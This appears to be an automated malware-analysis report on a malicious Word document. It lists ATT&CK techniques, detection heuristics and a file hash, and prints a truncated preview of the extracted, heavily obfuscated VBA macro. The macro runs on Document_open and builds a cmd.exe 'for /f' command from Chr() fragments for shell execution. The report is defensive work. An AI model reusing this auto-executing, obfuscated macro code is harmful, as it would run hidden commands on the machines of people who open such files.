Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_open event and uses the Shell() function, indicating an intent to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The ClamAV detection name 'Doc.Malware.Valyria-6615928-0' suggests this is a known malware variant.
Heuristics (6)

- ClamAV: Doc.Malware.Valyria-6615928-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6615928-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50777 bytes |

SHA-256: b963cc77127ab97eb87aab7307af1a96d0e82ae7f0df93a883b5d7539e2dcd6a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "mVdRRUHLPvX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RJoMcswOUaZPTs()
Brmfb = (52045 * SEOTX - 78867 + mWbUdM + (29415 - UHWFb + (rwDMCw - tSqdIf)))
lwPWn = (63613 * JwEiU - 11923 + uIOdc + (46130 - jPnikY + (iKRVX - jsnWQE)))
DCpWc = (94926 * NBMNO - 77349 + fiWwnm + (82489 - NukFVE + (pzoujJ - GtEpii)))
tJisH = (59469 * datjLo - 16917 + jhLtVL + (61961 - qMcwPh + (HsfbOF - MGJjOs)))
ifKUo = (38666 * HHfIQf - 2490 + boDJHa + (78113 - IzKjCV + (NXpTBj - NwDaaC)))
fNllLH = (65109 * OARzc - 43941 + IVzjaF + (22178 - VqCsD + (qVhkoo - kUQWJk)))
OoQFmm = (49953 * pDwpjb - 36077 + cqSrwC + (515 - PFFOo + (rSutO - wMIfjG)))
End Function
Private Sub Document_open()
On Error Resume Next
GwRLz = NdfDSM - udiJw + 75148 * HLhQwz - rATwRk / LNMGuF
FVVvhq = DaFMH - SdwsOW + 69349 * ccjCU - nfmnBc / aizWsB
wMpJbq = rdjDKV - tltMwW + 46570 * SLiSru - VVVuYd / ustBF
uMOdLa = (70912 + lAvhzl / 65031 / 71920 / (BNfQCw - 82099 + 55122 - BkETU - (LHmwB + 83506)))
SzznIICvNjZ = Application.Run("ioIIzrjMOVUw", "" + SbMSUQNkDStBv + PzLWdMG + CVar("c") + hjQSCEhLPVP + hIamjtzrcPwL + KGitp + whinAP + FBGlijClQzi + ZzuqHP + RathznKi + ZjdhTXRzl + XnRAVVK + ozkHIV + DtEjBmn + DLElCQD + SYupAsXjpVP + VAfbAoL + fzpHP + smswiasACpw + hMTnZGpWLJ + fMMCqZ + NKVvsINNA + trLtumT + ojYkODqqnt + QnPfiwTA + jIMwHWZRU + tDdYt + mbpQMDdqQ + ulAitQWNTQY + jHsMzDksi + KipHjb + rfVtT + wXZrCtNJrpvwLj + XBwYAhRfo)
dNLtYa = (60752 + ZUnGfU / 34782 / 5416 / (HstKi - 9163 + 50026 - ztRYAF - (bJWNj + 80309)))
wjkjzz = (63707 + fWzaT / 76845 / 51875 / (iZIAa - 91428 + 67076 - qEowPF - (ChBPaH + 12012)))
End Sub
Function fjnXSKjFXhBnh()
JYanit = (88095 + IObmV / 92149 / 48258 / (WIlKKz - 3380 + 18756 - pQhsEp - (TcKNNw + 73693)))
jMYZbf = (28509 + fkpNRh / 19722 / 43420 / (rpcMW - 7241 + 49271 - SslLla - (wjimd + 69114)))
TzwYj = (71813 + JhoqL / 92081 / 84122 / (YSNYSH - 96282 + 56789 - kzUUo - (TCKiqP + 20465)))
jmwlm = (85192 + CCVIc / 85192 / 28772 / (lKNJM - 75055 + 21274 - pnIfV - (hBTqY + 23286)))
ZSfFU = (78764 + JqavX / 21944 / 76682 / (vVTloj - 32189 + 64778 - uUnAN - (KNiGw + 98210)))
End Function
Function EYuSnWMjMa()
jcjoC = (58580 + NjtAn / 89903 / 26571 / (XIHFdb - 48030 + 48050 - jhkPTO - (uBEzCH + 25877)))
WiiEj = (54001 + zpmLIz / 32716 / 19923 / (lOzAs - 42969 + 97960 - Hwpktm - (pAUYvo + 99904)))
pDIUX = (90427 + aiGnz / 31838 / 10399 / (airvd - 37020 + 7815 - LTfYai - (IzPXSQ + 71056)))
llMkY = (81917 + bvvTNT / 36431 / 95996 / (DqIUt - 4307 + 88907 - HFmqP - (Qumlrp + 23519)))
ZdiKrA = (61579 + JAOit / 30372 / 95993 / (jilwib - 71 + 1766 - AwJEGA - (AUlYu + 18437)))
DovIl = (31941 + hNMYOP / 58821 / 42529 / (ESKCdU - 11957 + 18883 - Hobji - (aFKYV + 52997)))
dEfaR = (6753 + KHaon / 81052 / 12591 / (zdhfq - 2914 + 43409 - CzsiZi - (pZTbU + 49290)))
End Function
Attribute VB_Name = "tNUzWBv"
Function KGitp()
On Error Resume Next
URwRr = 73917 / Nwkrq - OnLtVB / FAuJmL
sKEjs = (hszUBZ * obnVKS / (IFwLK - obsFKP - 25841 * lAJhS))
oBDFWhsn = CStr(Chr(lwrBKaXuAQzGI + vHKFsJtd + 109 + WBHoMipYzXJIqW + bTfIGUlfwCvqR)) + "d /" + CStr(Chr(UqFoZQFoiJhLG + RoUBiZzspBQb + 99 + nzHPfoRl + aVfzwYJf)) + " " + "^F" + "Or " + "; , " + "/" + "^f " + " , " + CStr(Chr(lHWQzRWw + IoPiuKavaJVf + 34 + aMuAtRsl + YjdrQOSTVuD)) + " t"
fjiRnU = 92532 / vbazLA - zirGY / NbwFlN
dnsuBn = 76886 / tSETO - VTZjJz / QMRYJT
HrDhjSqoYi = "okens=" + " " + "2 de" + "li" + CStr(Chr(ACowNEY + AOpmXWE + 109 + XulGOhjfMrBKLE + tzFSijVn)) + "s=Q" + "=f0" + "o" + CStr(Chr(PBdrvPXAfqU + GPisjpvpJAjdZ + 34 + QqZzmiShBUv + LYzlzJwDvoow)) + " ;" + " %" + CStr(Chr(FBzOWPrjoRWHF + jXkCIdkCudPA + 99 + CkzOrNjEGZ + bjjPrDKVOQEvPM))
jMBGU = 46238 / jGiwm - XcQjz / jTPHH
sURMN = 74361 / CbZZT - IiwdPJ / uSNwz
HbZGT = 28413 / i
... (truncated)